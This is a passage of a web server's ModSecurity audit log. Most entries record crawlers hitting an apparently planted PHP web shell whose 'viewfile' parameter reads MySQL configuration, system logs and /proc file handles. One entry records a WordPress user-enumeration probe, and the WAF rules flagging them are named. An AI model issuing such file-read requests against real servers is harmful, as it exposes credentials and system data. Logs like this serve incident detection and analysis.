Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBm5iid3pHxA3RhGpzmvwAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099686555275 4434 (- - -) Stopwatch2: 1750099686555275 4434; combined=2294, p1=372, p2=1782, p3=41, p4=37, p5=62, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9ef91009-Z-- --dc0b3516-A-- [17/Jun/2025:00:18:08.663188 +0530] aFBm6BwcFb_n1P0IC9xh5AAAAAo 216.73.216.71 45814 127.0.0.1 7081 --dc0b3516-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fkern.log.2.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --dc0b3516-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2994 Connection: close Content-Type: text/html; charset=UTF-8 --dc0b3516-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.2.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBm6BwcFb_n1P0IC9xh5AAAAAo"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099688658630 4610 (- - -) Stopwatch2: 1750099688658630 4610; combined=2667, p1=484, p2=2064, p3=35, p4=33, p5=51, sr=142, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dc0b3516-Z-- --31cff102-A-- [17/Jun/2025:00:18:09.104484 +0530] aFBm6Y3q6eGJ2xNcTd6DVwAAAAU 216.73.216.71 45832 127.0.0.1 7081 --31cff102-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fmail.err.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --31cff102-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2993 Connection: close Content-Type: text/html; charset=UTF-8 --31cff102-H-- Message: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/mail.err" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/mail.err found within ARGS:viewfile: /proc/thread-self/root/var/log/mail.err.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBm6Y3q6eGJ2xNcTd6DVwAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099689022969 81594 (- - -) Stopwatch2: 1750099689022969 81594; combined=156868, p1=359, p2=1815, p3=38, p4=37, p5=77340, sr=98, sw=0, l=0, gc=77279 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --31cff102-Z-- --33dc7169-A-- [17/Jun/2025:00:19:01.232767 +0530] aFBnHVJfblPUQiSn5r1eVgAAAAA 216.73.216.71 40140 127.0.0.1 7081 --33dc7169-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fsyslog.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --33dc7169-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2992 Connection: close Content-Type: text/html; charset=UTF-8 --33dc7169-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBnHVJfblPUQiSn5r1eVgAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099741228651 4170 (- - -) Stopwatch2: 1750099741228651 4170; combined=2033, p1=342, p2=1570, p3=32, p4=34, p5=55, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --33dc7169-Z-- --bdc1ce62-A-- [17/Jun/2025:00:19:02.324710 +0530] aFBnHiid3pHxA3RhGpzm7AAAAAk 216.73.216.71 40268 127.0.0.1 7081 --bdc1ce62-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fmysql&viewfile=%2F%2Fproc%2Fself%2Froot%2Fetc%2Fmysql%2Fmy.cnf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --bdc1ce62-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3632 Connection: close Content-Type: text/html; charset=UTF-8 --bdc1ce62-H-- Message: Warning. Matched phrase "etc/mysql/my.cnf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/mysql/my.cnf found within ARGS:viewfile: /proc/self/root/etc/mysql/my.cnf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/mysql/my.cnf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/mysql/my.cnf found within ARGS:viewfile: /proc/self/root/etc/mysql/my.cnf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBnHiid3pHxA3RhGpzm7AAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099742320493 4283 (- - -) Stopwatch2: 1750099742320493 4283; combined=2324, p1=363, p2=1827, p3=36, p4=35, p5=63, sr=98, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bdc1ce62-Z-- --beeee069-A-- [17/Jun/2025:00:19:02.415945 +0530] aFBnHo3q6eGJ2xNcTd6DfgAAAAU 216.73.216.71 40276 127.0.0.1 7081 --beeee069-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fkern.log.4.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --beeee069-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2994 Connection: close Content-Type: text/html; charset=UTF-8 --beeee069-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.4.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBnHo3q6eGJ2xNcTd6DfgAAAAU"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099742411716 4283 (- - -) Stopwatch2: 1750099742411716 4283; combined=2216, p1=368, p2=1718, p3=35, p4=35, p5=60, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --beeee069-Z-- --b915611c-A-- [17/Jun/2025:00:19:12.159058 +0530] aFBnKJlL5_2Zd8wUdfLFwQAAAAg 216.73.216.71 48050 127.0.0.1 7081 --b915611c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fsyslog.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --b915611c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2992 Connection: close Content-Type: text/html; charset=UTF-8 --b915611c-H-- Message: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/syslog" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/syslog found within ARGS:viewfile: /proc/thread-self/root/var/log/syslog.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBnKJlL5_2Zd8wUdfLFwQAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099752154907 4216 (- - -) Stopwatch2: 1750099752154907 4216; combined=2252, p1=370, p2=1722, p3=36, p4=68, p5=56, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b915611c-Z-- --1fc6dd41-A-- [17/Jun/2025:00:19:12.523928 +0530] aFBnKFJfblPUQiSn5r1eZAAAAAA 216.73.216.71 48078 127.0.0.1 7081 --1fc6dd41-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog&viewfile=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flog%2Fkern.log.3.gz HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 216.73.216.71 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate --1fc6dd41-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2993 Connection: close Content-Type: text/html; charset=UTF-8 --1fc6dd41-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /proc/thread-self/root/var/log/kern.log.3.gz"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBnKFJfblPUQiSn5r1eZAAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099752519706 4276 (- - -) Stopwatch2: 1750099752519706 4276; combined=2303, p1=371, p2=1803, p3=36, p4=35, p5=58, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1fc6dd41-Z-- --00ffac37-A-- [17/Jun/2025:00:21:52.742460 +0530] aFBnyB6Azi2u_ik2Q3KmTgAAAAY 34.239.197.197 35714 127.0.0.1 7081 --00ffac37-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/184 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.239.197.197 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --00ffac37-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --00ffac37-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/184"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/184"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBnyB6Azi2u_ik2Q3KmTgAAAAY"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099912738758 3754 (- - -) Stopwatch2: 1750099912738758 3754; combined=2022, p1=288, p2=1608, p3=51, p4=24, p5=51, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --00ffac37-Z-- --0d724e16-A-- [17/Jun/2025:00:22:36.526001 +0530] aFBn9JlL5_2Zd8wUdfLGUgAAAAg 98.82.66.172 57970 127.0.0.1 7081 --0d724e16-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/165 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 98.82.66.172 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --0d724e16-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2954 Connection: close Content-Type: text/html; charset=UTF-8 --0d724e16-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/165"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/165"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBn9JlL5_2Zd8wUdfLGUgAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1750099956522218 3833 (- - -) Stopwatch2: 1750099956522218 3833; combined=1978, p1=324, p2=1549, p3=33, p4=23, p5=49, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0d724e16-Z-- --a45a3a09-A-- [17/Jun/2025:00:23:18.207106 +0530] aFBoHRwcFb_n1P0IC9xiwQAAAAo 143.244.57.84 50084 127.0.0.1 7081 --a45a3a09-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.tryons.ai X-Real-IP: 143.244.57.84 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 --a45a3a09-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.tryons.ai/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --a45a3a09-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tryons.ai|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.tryons.ai|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.tryons.ai"] [uri "/wp-json/wp/v2/users/"] [unique_id "aFBoHRwcFb_n1P0IC9xiwQAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tryons.ai/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1750099997273885 933316 (- - -) Stopwatch2: 1750099997273885 933316; combined=1939, p1=334, p2=1497, p3=0, p4=0, p5=108, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a45a3a09-Z-- --4b08e91b-A-- [17/Jun/2025:00:24:52.861011 +0530] aFBofCid3pHxA3RhGpzn5AAAAAk 52.203.65.83 54222 127.0.0.1 7081 --4b08e91b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/30 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.203.65.83 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --4b08e91b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2953 Connection: close Content-Type: text/html; charset=UTF-8 --4b08e91b-H-- Message: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/30"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/3" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/3 found within ARGS:viewfile: /proc/self/fd/30"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBofCid3pHxA3RhGpzn5AAAAAk"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100092856700 4364 (- - -) Stopwatch2: 1750100092856700 4364; combined=2313, p1=353, p2=1842, p3=37, p4=27, p5=54, sr=97, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4b08e91b-Z-- --2d291004-A-- [17/Jun/2025:00:25:08.967274 +0530] aFBojJVkCcfT-Z8NQYySjgAAAAc 3.235.215.92 33302 127.0.0.1 7081 --2d291004-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self/fd&viewfile=//proc/self/fd/198 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.235.215.92 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2d291004-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2955 Connection: close Content-Type: text/html; charset=UTF-8 --2d291004-H-- Message: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/198"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/fd/1" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/fd/1 found within ARGS:viewfile: /proc/self/fd/198"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aFBojJVkCcfT-Z8NQYySjgAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1750100108962874 4476 (- - -) Stopwatch2: 1750100108962874 4476; combined=2331, p1=351, p2=1827, p3=43, p4=31, p5=79, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2d291004-Z-- --55e3a414-A-- [17/Jun/2025:00:25:20.573873 +0530] aFBomH8PxMRZ7s11niQHjQAAAAI 144.172.103.59 41410 127.0.0.1 7080 --55e3a414-B-- POST 